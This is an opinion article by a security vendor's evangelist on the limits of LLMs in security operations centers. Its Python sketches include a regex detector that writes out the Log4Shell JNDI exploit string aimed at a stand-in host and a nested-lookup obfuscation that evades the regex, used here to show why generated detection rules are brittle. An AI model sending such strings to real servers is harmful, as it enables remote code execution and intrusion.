The Limits of New AI Technology in the Security Operations Center

While some see large language models (LLMs) as the do-everything solution for security operations centers (SOCs), LLMs aren't that smart yet.

Augusto Barros, Cyber-Security Evangelist, Securonix

August 29, 2024

Cybersecurity is experiencing the AI revolution. Every day, there is an announcement of a new product or feature leveraging LLMs to make security operations faster, more precise, or more efficient. The most excited pundits are already talking about fully autonomous SOCs, with the security analyst's job condemned to extinction.

But are we really about to see AI take over our threat detection and response capabilities? 

Since the advent of an AI singularity is still a possibility, I cannot say that a fully autonomous, AI-powered SOC will never exist. But claiming that the current wave of AI capabilities will lead to one is naive at best and, often, dishonest marketing from tech vendors.

Generative AI capabilities are indeed impressive, but they are still limited. Trained on vast amounts of data, GenAI systems create text, images, and even music. But these creations are bounded by ideas and concepts that have already been created by humans. Original ideas are still far beyond the grasp of current systems.

These systems are limited because they do not understand the concepts and ideas they are working with; they are just generating streams of text similar to their training sets. We've been surprised at how close to real intelligence this simple approach appears to be. Yet deeper exploration shows clear signs of "glorified autocomplete," as some have described it.

A few examples of "failures" from these systems give a better sense of their limitations. Questions such as "How many r's are there in 'strawberry'?" or "What is the world record for crossing the English Channel entirely on foot?" are perfect illustrations of the issue: many LLMs struggle to give a proper answer. It's not that ChatGPT, or any other of these systems, is clueless; it has no idea what it's "saying." Once we understand that there is no cognitive grasp of the underlying concepts being communicated, it's hard to even call these mistakes failures.

You may ask, why are we seeing so many interesting, useful implementations of these technologies? The answer is that they perform well for certain problems: those where the lack of cognitive ability and of a full understanding of the data and associated concepts is not a significant disadvantage. LLMs are great at generating text summaries, for example.

That's why one of the most successful implementations of AI for security operations is creating text explanations and summaries of incidents and investigations. Another great use case for LLMs is the simple generation of search queries or detection code from a human-written description. But for now, that's where most things stop.
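To make that use case concrete, here is a minimal sketch of turning a plain-English question into a search query. It assumes the OpenAI Python SDK purely for illustration; the model name, prompts, and the choice of Splunk's SPL as the output format are assumptions, not recommendations of any specific product.

# Minimal sketch: ask an LLM to translate an analyst's plain-English question
# into a SIEM search query. Model, prompts, and query language are assumptions.
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

question = "Show failed logins for privileged accounts over the last 24 hours"

response = client.chat.completions.create(
    model="gpt-4o-mini",  # assumption: any capable chat model would do
    messages=[
        {
            "role": "system",
            "content": "You translate analyst questions into Splunk SPL queries. "
                       "Return only the query, with no explanation.",
        },
        {"role": "user", "content": question},
    ],
)

print(response.choices[0].message.content)
# A human analyst still needs to review the generated query before running it.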

The threat detection problem is risky territory for SOCs using LLMs because it may look like the models can create detection content for us. I can get a decent result if I ask Microsoft Copilot for something like this: "Generate a Sigma rule to detect a Log4j attack." But if we delve deeper into this question and the generated answer, we can understand how limited AI still is for threat detection.

  • By saying "Log4j attack," I'm prompting the model to build content based on a well-known attack. Humans had to find and understand these attacks before all that content was produced. There is a time window between the first attacks occurring and their being found, properly understood, and described by humans; only then does the AI have content available to ingest and a rule to produce. This is definitely not an unknown attack.

  • The rule created is generic and based on the most well-known exploitation methods of a known vulnerability. Although it works, it's a brittle approach that will generate as many false positives and negatives as a rule written by an average human analyst, as the sketch below illustrates.
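To make the brittleness concrete, here is a minimal Python sketch of what such a generated, pattern-based rule boils down to. The JNDI lookup string is the widely published Log4Shell indicator, and the nested-lookup obfuscation is one of the publicly documented evasions; the code is purely illustrative, not a real detection rule.

import re

# Naive, generated-rule-style check: look for the canonical Log4Shell
# JNDI lookup string in a log line or HTTP header value.
PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell(value: str) -> bool:
    return bool(PATTERN.search(value))

# Textbook exploit string: caught.
print(looks_like_log4shell("${jndi:ldap://evil.example/a}"))  # True

# Publicly documented obfuscation using nested lookups: missed (false negative).
print(looks_like_log4shell("${${lower:j}ndi:${lower:l}dap://evil.example/a}"))  # False

# A benign log line that merely mentions the string: flagged (false positive).
print(looks_like_log4shell("user searched the wiki for '${jndi:ldap://'"))  # True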

People are excited about the power of these new models, claiming that LLMs will soon detect unknown attacks. They are wrong, both because of the limitations of AI technology and because of what "unknown attacks" really means. To better understand the limitations not only of AI but of any traditional detection system, we can look at the emergence of fileless attacks.

Malware detection systems once focused solely on files written to disk. They had hooks that could call the analyzer every time something was written to disk. What if we had an extremely efficient AI-based analyzer doing this job? Would that mean we had achieved a perfect anti-malware solution? No, because attackers have shifted their actions to places where data is not being collected for analysis. Fileless malware can be injected into memory and never written to disk, so our super AI would never be exposed to that malicious code. The initial assumption that all malware would be written to disk is no longer correct, and the AI system simply would not be looking in the right place.
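That visibility gap is easy to see in a sketch. Everything below is hypothetical and simplified; the point is only that an analyzer wired exclusively into the file-write path never gets a chance to judge a payload injected straight into memory.

# Hypothetical sketch: a detection hook that only fires on file writes.
# Names and verdict logic are illustrative, not a real anti-malware API.

def analyze(payload: bytes) -> bool:
    """Stand-in for an arbitrarily good AI-based malware analyzer."""
    return b"malicious" in payload  # placeholder verdict logic

def on_file_write(path: str, data: bytes) -> None:
    # The hook fires only when something is written to disk.
    if analyze(data):
        print(f"Blocked malicious file write: {path}")

# Classic malware that drops a file on disk: the hook sees it.
on_file_write("C:/temp/dropper.exe", b"malicious payload")

# Fileless technique: the payload goes straight into process memory.
# No file write occurs, the hook never fires, and the analyzer -- however
# good -- is never even asked for a verdict.
in_memory_payload = b"malicious shellcode injected into a running process"
# (no call to on_file_write happens here)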

Why New Attacks Are Hard to Detect  

Smart attackers find out how detection systems work and then develop new attacks that fall outside the visibility of the detection engine. Attack ingenuity happens on multiple levels, and those levels often bypass the areas where our detection capabilities are placed. An IP network may be fully instrumented to capture traffic, but that instrumentation is useless if one of the systems is compromised via a Bluetooth vulnerability.

There is no AI system capable of analyzing attack behavior at that level, finding the differences from previous behavior, and designing a solution to compensate for those changes. That's still a human job, and it will stay that way until artificial general intelligence (AGI) is here.

Know the Limits of AI in the SOC 

With any tool, we need to understand its value, where it is useful, and its limitations. We are getting a lot of value from GenAI-based capabilities that support security operations. But they are not a panacea. Organizations should not stretch them to places where they don't excel, or the result will be not only underwhelming but potentially disastrous.

About the Author

Augusto Barros

Cyber-Security Evangelist, Securonix

Augusto Barros is an established security professional, currently serving as VP, Cyber Security Evangelist at Securonix. In this role, Barros works to strategically deliver the best cloud-native threat detection and response solutions. He helps customers around the globe leverage the latest SIEM advancements with best-in-class analytics to avoid cyber threats and optimize ROI. Before joining Securonix, he spent five years as a research analyst at Gartner, talking to thousands of clients and vendors about their security operations challenges and solutions. His previous positions include security roles at CIBC and Finastra.
